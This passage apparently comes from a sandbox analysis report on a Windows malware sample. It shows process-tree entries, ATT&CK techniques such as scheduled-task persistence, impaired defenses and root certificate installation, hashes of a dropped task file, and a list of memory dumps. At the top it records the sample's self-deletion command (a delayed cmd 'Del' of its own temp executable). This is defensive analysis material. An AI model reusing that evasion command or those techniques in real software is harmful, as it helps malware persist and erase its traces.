"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
3⤵
- Deletes itself
PID:1716

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:1844

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "782886799-18752547461431446477-714199134-20677965201825209682-4285672631748500549"
1⤵
PID:1180

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
e058790b9c2fbeb743377f3d4f67df2d

SHA1
377b30fbd7ec2a448bf892cf47346c85ed9ad06c

SHA256
ccce469a64340e9bdb1bcd0cb8601fda82ac66a47b2662d27ab71214e97f6b3d

SHA512
1a19855cbcdc36679a57d57eff684667dae7c8a66d8f29dd6e496f910179e1cf9a558f1589dc8f8b0759e6987e7c4674ca8acb0f16a511466ebecb3ce7109ce0

Download Submit
memory/296-238-0x0000000000CF0000-0x0000000000D1A000-memory.dmp

Filesize
168KB

Download
memory/296-239-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/360-240-0x0000000001C50000-0x0000000001C7A000-memory.dmp

Filesize
168KB

Download
memory/360-241-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/416-219-0x0000000000720000-0x0000000000743000-memory.dmp

Filesize
140KB

Download
memory/416-137-0x0000000000720000-0x0000000000743000-memory.dmp

Filesize
140KB

Download
memory/416-140-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp

Filesize
64KB

Download
memory/416-143-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/416-221-0x0000000000750000-0x000000000077A000-memory.dmp

Filesize
168KB

Download
memory/416-281-0x0000000000750000-0x000000000077A000-memory.dmp

Filesize
168KB

Download
memory/428-65-0x0000000000000000-mapping.dmp

Download
memory/432-77-0x0000000000000000-mapping.dmp

Download
memory/460-145-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp

Filesize
64KB

Download
memory/460-280-0x0000000000A30000-0x0000000000A5A000-memory.dmp

Filesize
168KB

Download
memory/460-146-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/460-226-0x0000000000A30000-0x0000000000A5A000-memory.dmp

Filesize
168KB

Download
memory/476-228-0x00000000000C0000-0x00000000000EA000-memory.dmp

Filesize
168KB

Download
memory/476-150-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/476-149-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp

Filesize
64KB

Download
memory/476-282-0x00000000000C0000-0x00000000000EA000-memory.dmp

Filesize
168KB

Download
memory/484-155-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/484-153-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp

Filesize
64KB

Download
memory/484-283-0x00000000002D0000-0x00000000002FA000-memory.dmp

Filesize
168KB

Download
memory/484-229-0x00000000002D0000-0x00000000002FA000-memory.dmp

Filesize
168KB

Download
memory/524-67-0x0000000000000000-mapping.dmp

Download
memory/528-69-0x0000000000000000-mapping.dmp

Download
memory/548-114-0x0000000000000000-mapping.dmp

Download
memory/564-82-0x0000000000000000-mapping.dmp

Download
memory/580-284-0x0000000000230000-0x000000000025A000-memory.dmp

Filesize
168KB

Download
memory/580-230-0x0000000000230000-0x000000000025A000-memory.dmp

Filesize
168KB

Download
memory/580-159-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/580-157-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp

Filesize
64KB

Download
memory/608-78-0x0000000000000000-mapping.dmp

Download
memory/616-112-0x0000000000000000-mapping.dmp

Download
memory/656-285-0x0000000000190000-0x00000000001BA000-memory.dmp

Filesize
168KB

Download
memory/656-163-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/656-231-0x0000000000190000-0x00000000001BA000-memory.dmp

Filesize
168KB

Download
memory/656-161-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp

Filesize
64KB

Download
memory/684-128-0x00000001400033F4-mapping.dmp

Download
memory/684-256-0x0000000000ED0000-0x0000000000EFA000-memory.dmp

Filesize
168KB

Download
memory/684-224-0x0000000076F90000-0x0000000077139000-memory.dmp

Filesize
1.7MB

Download
memory/684-130-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/684-127-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/684-141-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/684-132-0x0000000076F90000-0x0000000077139000-memory.dmp

Filesize
1.7MB

Download
memory/684-279-0x0000000076F90000-0x0000000077139000-memory.dmp

Filesize
1.7MB

Download
memory/684-134-0x0000000076E70000-0x0000000076F8F000-memory.dmp

Filesize
1.1MB

Download
memory/720-165-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp

Filesize
64KB

Download
memory/720-286-0x00000000003A0000-0x00000000003CA000-memory.dmp

Filesize
168KB

Download
memory/720-232-0x00000000003A0000-0x00000000003CA000-memory.dmp

Filesize
168KB

Download
memory/720-167-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/788-288-0x00000000008F0000-0x000000000091A000-memory.dmp

Filesize
168KB

Download
memory/788-235-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/788-234-0x00000000008F0000-0x000000000091A000-memory.dmp

Filesize
168KB

Download
memory/816-100-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-105-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-101-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-102-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-109-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-98-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-96-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-95-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-117-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-107-0x0000000140001844-mapping.dmp

Download
memory/816-103-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/816-106-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/836-233-0x0000000000890000-0x00000000008BA000-memory.dmp

Filesize
168KB

Download
memory/836-287-0x0000000000890000-0x00000000008BA000-memory.dmp

Filesize
168KB

Download
memory/860-237-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/860-236-0x0000000000880000-0x00000000008AA000-memory.dmp

Filesize
168KB

Download
memory/876-270-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/876-271-0x0000000003A00000-0x0000000003A05000-memory.dmp

Filesize
20KB

Download
memory/876-273-0x0000000003A80000-0x0000000003AA1000-memory.dmp

Filesize
132KB

Download
memory/876-269-0x0000000073BD0000-0x000000007417B000-memory.dmp

Filesize
5.7MB

Download
memory/876-218-0x0000000073BD0000-0x000000007417B000-memory.dmp

Filesize
5.7MB

Download
memory/876-119-0x0000000000000000-mapping.dmp

Download
memory/876-121-0x0000000075981000-0x0000000075983000-memory.dmp

Filesize
8KB

Download
memory/896-75-0x0000000000000000-mapping.dmp

Download
memory/952-249-0x00000000003D0000-0x00000000003FA000-memory.dmp

Filesize
168KB

Download
memory/952-250-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/964-246-0x00000000007A0000-0x00000000007CA000-memory.dmp

Filesize
168KB

Download
memory/968-71-0x0000000000000000-mapping.dmp

Download
memory/1036-242-0x00000000003A0000-0x00000000003CA000-memory.dmp

Filesize
168KB

Download
memory/1056-73-0x0000000000000000-mapping.dmp

Download
memory/1060-70-0x0000000000000000-mapping.dmp

Download
memory/1116-86-0x0000000000000000-mapping.dmp

Download
memory/1152-81-0x0000000000000000-mapping.dmp

Download
memory/1180-275-0x00000000007A0000-0x00000000007CA000-memory.dmp

Filesize
168KB

Download
memory/1180-255-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/1180-254-0x00000000007A0000-0x00000000007CA000-memory.dmp

Filesize
168KB

Download
memory/1192-244-0x0000000001BF0000-0x0000000001C1A000-memory.dmp

Filesize
168KB

Download
memory/1192-245-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/1204-84-0x0000000000000000-mapping.dmp

Download
memory/1224-253-0x00000000003C0000-0x00000000003EA000-memory.dmp

Filesize
168KB

Download
memory/1252-61-0x000007FEED580000-0x000007FEEDFA3000-memory.dmp

Filesize
10.1MB

Download
memory/1252-59-0x0000000000000000-mapping.dmp

Download
memory/1252-63-0x0000000002350000-0x00000000023D0000-memory.dmp

Filesize
512KB

Download
memory/1252-62-0x000007FEECA20000-0x000007FEED57D000-memory.dmp

Filesize
11.4MB

Download
memory/1252-64-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/1272-243-0x0000000000370000-0x000000000039A000-memory.dmp

Filesize
168KB

Download
memory/1296-66-0x0000000000000000-mapping.dmp

Download
memory/1324-247-0x0000000002940000-0x000000000296A000-memory.dmp

Filesize
168KB

Download
memory/1324-248-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/1404-79-0x0000000000000000-mapping.dmp

Download
memory/1448-72-0x0000000000000000-mapping.dmp

Download
memory/1484-135-0x0000000076F90000-0x0000000077139000-memory.dmp

Filesize
1.7MB

Download
memory/1484-123-0x000007FEF3260000-0x000007FEF3DBD000-memory.dmp

Filesize
11.4MB

Download
memory/1484-136-0x0000000076E70000-0x0000000076F8F000-memory.dmp

Filesize
1.1MB

Download
memory/1484-118-0x0000000000000000-mapping.dmp

Download
memory/1484-122-0x000007FEF3DC0000-0x000007FEF47E3000-memory.dmp

Filesize
10.1MB

Download
memory/1484-133-0x00000000009EB000-0x0000000000A0A000-memory.dmp

Filesize
124KB

Download
memory/1484-131-0x00000000009E4000-0x00000000009E7000-memory.dmp

Filesize
12KB

Download
memory/1484-126-0x0000000076E70000-0x0000000076F8F000-memory.dmp

Filesize
1.1MB

Download
memory/1484-125-0x0000000076F90000-0x0000000077139000-memory.dmp

Filesize
1.7MB

Download
memory/1484-124-0x00000000009E4000-0x00000000009E7000-memory.dmp

Filesize
12KB

Download
memory/1496-80-0x0000000000000000-mapping.dmp

Download
memory/1524-76-0x0000000000000000-mapping.dmp

Download
memory/1532-85-0x0000000000000000-mapping.dmp

Download
memory/1560-111-0x0000000000000000-mapping.dmp

Download
memory/1568-89-0x0000000000000000-mapping.dmp

Download
memory/1660-90-0x0000000000000000-mapping.dmp

Download
memory/1684-93-0x0000000000000000-mapping.dmp

Download
memory/1684-277-0x0000000000100000-0x0000000000121000-memory.dmp

Filesize
132KB

Download
memory/1684-260-0x00000000004039E0-mapping.dmp

Download
memory/1684-276-0x00000000000E0000-0x00000000000FB000-memory.dmp

Filesize
108KB

Download
memory/1684-274-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1684-272-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1716-115-0x0000000000000000-mapping.dmp

Download
memory/1736-83-0x0000000000000000-mapping.dmp

Download
memory/1744-88-0x0000000000000000-mapping.dmp

Download
memory/1768-91-0x0000000000000000-mapping.dmp

Download
memory/1780-87-0x0000000000000000-mapping.dmp

Download
memory/1828-68-0x0000000000000000-mapping.dmp

Download
memory/1844-116-0x0000000000000000-mapping.dmp

Download
memory/1904-74-0x0000000000000000-mapping.dmp

Download
memory/1904-113-0x0000000000000000-mapping.dmp

Download
memory/1952-94-0x0000000002840000-0x0000000002846000-memory.dmp

Filesize
24KB

Download
memory/1952-54-0x0000000000880000-0x000000000120A000-memory.dmp

Filesize
9.5MB

Download
memory/1952-58-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

Filesize
8KB

Download
memory/1952-57-0x000000001C2F0000-0x000000001C750000-memory.dmp

Filesize
4.4MB

Download
memory/1956-251-0x0000000000130000-0x000000000015A000-memory.dmp

Filesize
168KB

Download
memory/1956-252-0x0000000036FD0000-0x0000000036FE0000-memory.dmp

Filesize
64KB

Download
memory/2032-92-0x0000000000000000-mapping.dmp

Download